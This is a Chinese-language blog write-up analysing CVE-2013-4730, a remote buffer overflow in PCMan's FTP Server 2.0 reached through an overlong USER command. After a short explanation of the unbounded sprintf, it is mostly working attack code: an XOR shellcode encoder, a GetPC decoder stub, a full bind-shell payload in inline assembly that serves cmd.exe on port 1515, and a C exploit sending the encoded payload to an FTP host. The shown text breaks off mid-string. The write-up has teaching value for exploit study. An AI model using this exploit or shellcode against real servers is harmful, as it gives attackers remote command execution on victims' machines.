-
-
[原创]小白分析PCManFTP漏洞 CVE-2013-4730
-
2020-11-26 19:23
-
软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2020-11-24 | 操作系统:Window 7 专业版(32位) 漏洞编号:CVE-2013-4730 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:远程 |
1.软件简介
PCMan's FTP Server是洪任谕先生所研发的一套FTP服务器软件。
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。
默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控制信息。但是,是否使用20作为传输数据的端口与FTP使用的传输模式有关,如果采用主动模式,那么数据传输端口就是20;如果采用被动模式,则具体最终使用哪个端口要服务器端和客户端协商决定。
| FTP协议常用指令 | 功能说明 |
USER <username> PASS <password> CWD <dir path> RETR <filename> RMD <directory> RNTO <new path> HELP <command> | 用户名 密码 改变服务器上的工作目录 在服务器上删除指定目录 从服务器上找回(复制)文件 对新路径重命名 返回指定命令信息 |
2.漏洞成因
PCMan's FTP Server 2.0版本中存在缓冲区溢出漏洞。远程攻击者可借助USER命令中的长字符串利用该漏洞执行任意代码。在recv函数上下断点持续跟踪,发现服务端在接收到登录请求之后,会将受到的信息进行字符串拼接,而在字符串拼接的地方,并未进行长度控制,因此导致缓冲区溢出,即使用sprintf 对于写入buffer的字符数是没有限制的,这就存在了buffer溢出的可能性。解决这个问题,可以考虑使用 snprintf函数,该函数可对写入字符数做出限制。
3.利用过程
3.1准备工作
1)自动生成有序数,并能确定异常点的偏移(可以使用windbg插件Mona2)
2)Mona2环境需要Python 2.7
3)Windbg(用来定位JMP ESP地址)
4)OllyDbg(为了后续测试)
5)Visual Studio2019写测试代码和ShellCode
3.2配置环境
1)虚拟机win7专业版sp1
2)安装WDK,它自带WinDBG
3)安装Python2.7.2
4)安装Visual C++ 2008运行库
5)安装WinDbg的Python插件Pykd
6)复制mona.py和windbglib.py到WinDbg同目录
7)运行WinDbg随便调试一个程序进行测试以上环境
.load pykd.pyd加载pykd
!py mona 测试Mona
.reload /f加载windbg符号
3.3软件测试
FTP需要符合标准:RFC959
1)建立Socket连接,连接目标FTP
2)连接FTP服务器的欢迎语
3)发送”USER XXX”到FTP
4)接受请求结果
5)详细代码在后文exploit(poc中4))
3.4手动Fuzz测试
构建长字符串进行测试,使用mona生成有序长字符串!Py mona pc 3000,替换掉”+++Haha+++”,再测试,发现测试代码在等待服务器信息处不能退出,虚拟机中的程序已经崩溃
观察windbg中的信息,得到异常信息并查找到异常处在字符串中的位置
得到偏移后,在系统中查找一个JMP ESP作为跳板
用当前指令(!py mona jmp r esp)得到的地址不能作为跳板,因为如果转成字符串, 会有00出现,使用指定模块查找方法
3.5 Shellcode组合逻辑
第一部分:”USER ”(注意有空格)
第二部分:无意义的字符串,长度为2001个字节
第三部分:JMP ESP
第四部分:解密代码+Payload,位于ESP指向的地址,与JMP ESP指令相差4个字节
Payload 在读取时被0x00字符截断了,对Payload 进行异或加密,并在开头加上解密代码的十六进制数
3.6 Payload(BindShell)
BindShell原理:将一个cmd控制台的标准输入输出句柄定向至一个网络端口,那么本地的cmd控制台不会接受本地的命令输入,同样本地也不会看到命令执行的回显,此时连接本地网络端口的远程程序获得了此cmd控制台的所有权限,可以像在本地一样直接控制被连接的机器
本文中首先发送shellcode给ftp,这时候创建socket,绑定的端口是21,payload中也会创建socket,它绑定的端口是1515,所以当发送shellcode之后,主机连接对方时cmd命令是 telnet加上ip再加上1515
4.POC
1)实现加密功能的代码
#include "stdio.h"
#include "windows.h"
bool AutoEnCoder( char* pData, int nSize )
{
// 1. 尝试不同的KEY进行加密,直到加密后不出现 0x00;
int nOutKey = 0x00;
unsigned char* pBuffer = nullptr;
bool bComplete = true;
pBuffer = ( unsigned char* )new char[ nSize + 1 ];
for ( int key = 0; key <= 0xFF; key++)
{
nOutKey = key;
bComplete = true;
for ( int i = 0; i < nSize; i++ )
{
pBuffer[ i ] = pData[ i ] ^ key;
if ( 0x00 == pBuffer[i] || 0x0A == pBuffer[i] || 0x0D == pBuffer[i] || 0x20 == pBuffer[i])
{
// 如果加密后的字节为0x00直接跳出循环,用下一个KEY进行加密
bComplete = false;
break;
}
}
if (bComplete)
{
// 如果到了这里依然都是不为0的结果,那么说明加密完成。跳出
break;
}
}
if ( !bComplete )
{
// 全部找完还未加密完成直接不做接下来的操作
return false;
}
// 保存KEY和加密后的文本
FILE* fpOutFile;
if ( EINVAL == fopen_s(&fpOutFile,"Encode.txt","w+") )
{
// 增加健壮
return false;
}
// 输出'Encode Key = 0xXX'
fprintf( fpOutFile, "/* Encode Key = 0x%.2x */\n", nOutKey );
// 输出加密后的字符数组
fprintf( fpOutFile, "char ShellCode[] = \\\n" );
for (int i = 0; i < nSize; i++ )
{
fprintf( fpOutFile, "\\x%.2X", pBuffer[ i ] );
if ((i+1)%16 == 0)
{
fprintf( fpOutFile, "\"\\\n" );
}
}
// 再输出一个 ";
fprintf( fpOutFile, "\";" );
// 完成,关闭句柄,释放资源
fclose( fpOutFile );
delete[]pBuffer;
return true;
}
char cShellCode[] = "被加密代码的opecode写这里哟";
int main()
{
AutoEnCoder(cShellCode,sizeof(cShellCode));
return 0;
}2)实现解密功能的代码
#include "stdio.h"
#include "windows.h"
int main()
{
_asm
{
xor eax, eax;
// GetPC
call tag_Get_PC - 1;
tag_Get_PC:
retn;
pop eax;
// Decode
lea esi, [ eax + 0x1B ];
xor ecx, ecx;
mov cx, 0x27b;
tag_Decode:
mov al, [ esi + ecx ];
xor al, 0x17;
mov[ esi + ecx ], al;
loop tag_Decode;
xor[ esi + ecx ], 0x17;
jmp esi;
}
return 0;
}3)Payload代码(bindshell)
#include<Windows.h>
int main()
{
_asm
{
sub esp, 0x50;
push ebp;
mov ebp, esp;
sub esp, 0x10;
jmp tag_ShellCode; // 前置代码跳过数据区
// cmd.exe\0 25
_asm _emit(0x63) _asm _emit(0x6D) _asm _emit(0x64) _asm _emit(0x2E)
_asm _emit(0x65) _asm _emit(0x78) _asm _emit(0x65) _asm _emit(0x00)
// ws2_32.dll\0 1D
_asm _emit(0x77) _asm _emit(0x73) _asm _emit(0x32) _asm _emit(0x5F)
_asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64)
_asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00)
// kernel32.dll\0 12
_asm _emit(0x6B) _asm _emit(0x65) _asm _emit(0x72) _asm _emit(0x6E)
_asm _emit(0x65) _asm _emit(0x6C) _asm _emit(0x33) _asm _emit(0x32)
_asm _emit(0x2E) _asm _emit(0x64) _asm _emit(0x6C) _asm _emit(0x6C)
_asm _emit(0x00);
tag_ShellCode:
// 1. GetPC
call tag_Next;
tag_Next:
pop ebx; // 这里就得到了shellcode的地址
mov[ebp - 0x04], ebx; // EBP - 4 CodeBase;
// 2. 获取关键地址:kernel32.dll地址
mov esi, fs:[0x30]; // PEB addr
mov esi, [esi + 0x0c]; // PEB_LDR_DATA
mov esi, [esi + 0x1c]; // 双向链表
mov esi, [esi]; // 取出下一个结构体地址
mov edx, [esi + 0x08]; // 获取Kernel32.dll地址
//mov[ ebp - 0x08 ], edx; // EBP - 8 KernelBaseAddr
// 3. 查找 LoadLibraryExA地址
push edx; // KernelBaseAddr
push 0xc0d83287; // 提前计算好的LoadLibraryExA字符的简易HASH
call fun_GetFunAddrByHash; // 通过比较HASH查找 关键函数
mov edi, eax;
// 4. 加载Kernel32.dll增加兼容性
lea esi, [ebx - 0x12]; // "Kernel32.dll"字符串地址
push 0; // dwFlag = 0
push 0; // hFile = 0
push esi; // lpLibFileName = "Kernel32.dll"
call edi; // LoadLibraryExA();
mov[ebp - 0x08], eax;
// 5. 加载WS2_32.dll以方便后边的网络通信编程
lea esi, [ebx - 0x1D]; // "ws2_32.dll"字符串地址
push 0; // dwFlag = 0
push 0; // hFile = 0
push esi; // lpLibFileName = "ws2_32.dll"
call edi; // LoadLibraryExA();
mov[ebp - 0x0c], eax;
// 6. 执行PayLoad部分
push[ebp - 0x0c]; // ws2_32.dll 地址
push[ebp - 0x08]; // Kernel32.dll addr
push[ebp - 0x04]; // CodeBase addr
call fun_PayLoad;
// 7. PayLoad 执行完毕结束程序,防止被调试分析
push[ebp - 0x08]; // KernelBase
push 0x4fd18963; // ExitProcess hash值
call fun_GetFunAddrByHash;
push 0; // ExitCode = 0;
call eax; // ExitProcess(0);
mov esp, ebp;
pop ebp;
fun_GetFunAddrByHash:
push ebp;
mov ebp, esp;
sub esp, 0x0c;
push edx;
// 1. 获取EAT,ENT,EOT地址:
mov ecx, [ebp + 0x0c]; // ecx,参数1是 IMAGEBASE
mov eax, [ecx + 0x3c]; // edx + 3c 是DOS头指向NT头的偏移
mov eax, [eax + ecx + 0x78]; // eax + edx 是NT头的地址 再 + 0x78 是数据目录表[0]的偏移
mov edi, [eax + ecx + 0x1c]; // EAT RVA
add edi, ecx;
mov[ebp - 0x04], edi; // EAT 保存到局部变量1中
mov edi, [eax + ecx + 0x20]; // ENT
add edi, ecx;
mov[ebp - 0x08], edi; // ENT 保存到局部变量2中
mov edi, [eax + ecx + 0x24]; // EOT
add edi, ecx;
mov[ebp - 0x0c], edi; // EOT 保存到局部变量3中
mov edi, [eax + ecx + 0x18]; // 导出表中 名称数量
// 2. 循环比较ENT中的函数名
xor ecx, ecx;
jmp tag_FirstCmp;
tag_CmpFunNameLoop:
inc ecx;
tag_FirstCmp:
mov esi, [ebp - 0x08]; // ENT addr
mov esi, [esi + ecx * 4]; // ENT RVA 当下一次比较时,指针 + 4
mov edx, [ebp + 0x0c]; // KernelBase
lea esi, [edx + esi]; // 获取到具体函数名的指针
push[ebp + 0x08]; // 参数2:要进行对比的摘要
push esi; // 函数名指针
call fun_Hash_CmpString; // ecx = "GetProcAddress"长度
cmp eax, 1; // 如果对比函数返回1则说明找到这个函数了
jne tag_CmpFunNameLoop; // 不相等继续进行比较
mov esi, [ebp - 0x0c]; // 取出EOT
xor edi, edi;
mov di, [esi + ecx * 2]; // di是序号,函数名在ENT表中的下标与序号表中的序号是对应的;要在EOT中找到这个ECX对应的地方
// *2 是每个序号为WORD型,占两个字节,要偏移ECX * 2个字节 才是需要的数据
// 这个数据 用于在EAT中作为下标查找对应的地址;
mov edx, [ebp - 0x04]; // 取出 EAT
mov esi, [edx + edi * 4]; // esi = 用序号在函数地址数组找到函数名对应函数地址
mov edx, [ebp + 0x0c]; // edx = param_1 IMAGE_BASE
// 返回获取到的关键函数地址
lea eax, [edx + esi]; // getprocaddress
pop edx;
mov esp, ebp;
pop ebp;
retn 0x08;
fun_Hash_CmpString:
push ebp;
mov ebp, esp;
sub esp, 0x04; // 开辟局部变量并清零
mov dword ptr[ebp - 0x04], 0x00;
push ebx; // 保存用到的寄存器
push ecx;
push edx;
mov esi, [ebp + 0x08]; // strFunName
xor ecx, ecx;
xor eax, eax;
tag_HashLoop:
mov al, [esi + ecx]; // 字符串的第ecx字符
test al, al; // 判断是否为0。
jz tag_HashEnd; // 为0结束循环
mov ebx, [ebp - 0x04]; // 得到hash1
shl ebx, 0x19; // hash1<< 25
mov edx, [ebp - 0x04]; // hash2>>7
shr edx, 0x07;
or ebx, edx; // hash1 + hash2
add ebx, eax; // 添加下一个字符的ASCII
mov[ebp - 0x04], ebx;
inc ecx; // ecx++
jmp tag_HashLoop;
tag_HashEnd:
mov ebx, [ebp + 0x0c]; // 这里得到 函数名摘要
mov edx, [ebp - 0x04]; // 要进行对比的摘要
xor eax, eax;
cmp ebx, edx; // 比较这两个摘要
jne tag_FunEnd; // 不相等就结束比较
mov eax, 1; // 相等返回1
tag_FunEnd:
pop edx;
pop ecx;
pop ebx;
mov esp, ebp;
pop ebp;
retn 0x08;
fun_PayLoad:
push ebp;
mov ebp, esp;
sub esp, 0x300;
// 1. 初始化winsock服务
push[ebp + 0x10]; // kernelBase
push 0x80b46a3d; // WSAStartup 摘要
call fun_GetFunAddrByHash;
lea esi, [ebp - 0x300]; // WSADATA
push esi; // LPWSAData = WSADATA
push 0x0202; // wVersionRequested = 2.2
call eax; // WSAStartup()
test eax, eax; // 函数返回结果 0 为执行成功
jnz tag_PayLoadEnd;
// 2. 创建一个原始套接字
push[ebp + 0x10]; // kernelbase
push 0xde78322d; // WSASocketA 摘要
call fun_GetFunAddrByHash;
push 0;
push 0;
push 0;
push 6; // protocol = IPPROTO_TCP
push 1; // type = sock_STREAM
push 2; // -af = AF_INET
call eax; // WSASocketA()
mov[ebp - 0x04], eax; // 得到的套接字给局部变量
// 3. 在任意地址上绑定一个端口1515;
push[ebp + 0x10]; // kernelBase
push 0xdda71064; // bind 摘要
call fun_GetFunAddrByHash;
mov word ptr[ebp - 0x200], 0x02; // sockaddr_in.sin_family = AF_INET
mov word ptr[ebp - 0x1fe], 0xeb05;// sockAddr_in.sin_port = 1515(0xEB05) htons(1515);
mov dword ptr[ebp - 0x1fc], 0; // sockaddr_in.sin_addr = inaddr_any
lea esi, [ebp - 0x200]; // esi = sockaddr_in
push 0x14; // 结构体长度
push esi; // 结构体:SOCKADDR_IN
push[ebp - 0x04]; // socket
call eax; // bind();
test eax, eax; // 绑定成功返回0
jnz tag_PayLoadEnd;
// 4. 监听端口的连接
push[ebp + 0x10];
push 0x4bd39f0c;
call fun_GetFunAddrByHash;
push 0x7fffffff; // backlong = SOMAXCONN
push[ebp - 0x04]; // socket
call eax; // listen()
cmp eax, 0;
//and eax, eax; // 成功返回0
jnz tag_PayLoadEnd;
// 5. 接受连接
push[ebp + 0x10];
push 0x01971eb1;
call fun_GetFunAddrByHash;
push 0; // 参数3:addrlen = null
push 0; // 参数2:addr = null
push[ebp - 0x04]; // 参数1:socket
call eax; // accept()
mov[ebp - 0x04], eax; // 返回结果到局部变量
// 6. 创建一个cmd进程
push[ebp + 0x0c]; // kernel32.dll base
push 0x6ba6bcc9;
call fun_GetFunAddrByHash;
mov edx, eax; // CreateProcess() 地址
lea edi, [ebp - 0x90]; // 清空STARTUPINFOA
mov ecx, 0x11; // STARTUPINFOA
mov eax, 0x00; // 从EBP - 0x90开始
cld; // 到ebp-0x48结束
rep stosd;
mov dword ptr[ebp - 0x90], 0x00000044; // cb = 68
mov dword ptr[ebp - 0x64], 0x00000101; // dwFlag = STARTF_USESTDHANDLES
mov word ptr[ebp - 0x60], 0x0000; // wShowWindow = SW_HIDE
mov esi, [ebp - 0x04]; // socket
mov dword ptr[ebp - 0x58], esi; // Input = socket
mov dword ptr[ebp - 0x54], esi; // Output = socket
mov dword ptr[ebp - 0x50], esi; // Error = socket
lea esi, [ebp - 0x90]; // STARTUPINFOA
lea edi, [ebp - 0x200]; // PROCESS_INFORMATION 结构体
mov ebx, [ebp + 0x08]; // CodeBase
lea ebx, [ebx - 0x25]; // "cmd.exe\0"
push edi;
push esi;
push 0;
push 0;
push 0;
push 1;
push 0;
push 0;
push ebx;
push 0;
call edx; // CreateProcessA()
tag_PayLoadEnd:
mov esp, ebp;
pop ebp;
retn 0x0c;
}
return 0;
}4)Exploit代码,其中字符串pCompand是shellcode的opecode
#include <WinSock2.h>
#include <windows.h>
#pragma comment(lib,"Ws2_32.lib")
int main()
{
// 1. 初始化SOCKET
WSADATA stWSA;
WSAStartup(0x0202, &stWSA);
// 2. 创建原始套接字
SOCKET stListen = INVALID_SOCKET;
stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
// 3. 在任意地址绑定一个端口21(INADDR_ANY)
SOCKADDR_IN stService;
stService.sin_addr.s_addr = inet_addr("192.168.161.132");
stService.sin_port = htons(21);
stService.sin_family = AF_INET;
connect(stListen, (SOCKADDR*)& stService, sizeof(stService));
// 4. 接受返回信息缓冲区
char szRecv[0x100] = { 0 };
// 5.登录请求
char pCompand[] = "\x55\x53\x45\x52\x20\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\
"\x30\x30\x30\x30\x30\x30\xF7\xF7\x02\x76\x41\x41\x41\x41"\
"\x33\xC0"
"\xE8\xFF\xFF\xFF\xFF"\
"\xC3"\
"\x58"\
"\x8D\x70\x1B"
"\x33\xC9"\
"\x66\xB9\x79\x02"
"\x8A\x04\x0E\x34\x17\x88\x04\x0E\xE2\xF6\x80\x34\x0E\x17\xFF\xE6" \
"\x94\xFB\x47\x42\x9C\xFB\x94\xFB\x07\xFC\x37\x74\x7A\x73\x39\x72"\
"\x6F\x72\x17\x60\x64\x25\x48\x24\x25\x39\x73\x7B\x7B\x17\x7C\x72"\
